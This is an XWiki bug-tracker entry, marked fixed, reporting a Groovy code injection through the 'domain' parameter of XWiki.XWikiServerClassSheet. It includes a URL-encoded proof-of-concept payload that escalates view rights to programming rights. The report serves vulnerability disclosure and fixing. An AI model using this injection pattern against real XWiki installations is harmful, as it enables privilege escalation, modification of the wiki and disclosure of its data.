Details
-
Bug
-
Resolution: Fixed
-
Blocker
-
5.3-milestone-2
Description
Steps to reproduce:
- Get the form token (attribute data-xwiki-form-token on any page).
- Open the URL <server>/xwiki/bin/view/Main/?sheet=XWiki.XWikiServerClassSheet&form_token=<form_token>&action=delete&domain=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D, where <server> is the server of the XWiki installation and <form_token> is the form token you obtained in the first step.
Expected result:
The message "Wiki alias "foo"/}}async async="true" cached="false" context="doc.reference"groovy}}println("hello from groovy!"){{/groovy/async" does not exists." is displayed (or any other error message).
Actual result:
The message "Wiki alias "foo" does not exists.hello from groovy!"/}}" is displayed, or in other words, the Groovy code has been executed.
This demonstrates a privilege escalation from just view rights on XWiki.XWikiServerClassSheet and a single other document (in this example, it is the main page, it can be any other page) to programming rights. As the result of the macro execution is displayed, this can not only be used to modify the wiki but also quite easily to disclose all information in the wiki without modifying it.
The affects version is only the version on which I reproduced the issue, this is very likely much older.
Attachments
Issue Links
- is caused by
-
XWIKI-9516 Create a new Wiki API that replaces xwiki-platform-wiki-manager and xwiki-platform-workspace
-
- Closed
-
- relates to
-
-
- Closed
-
- links to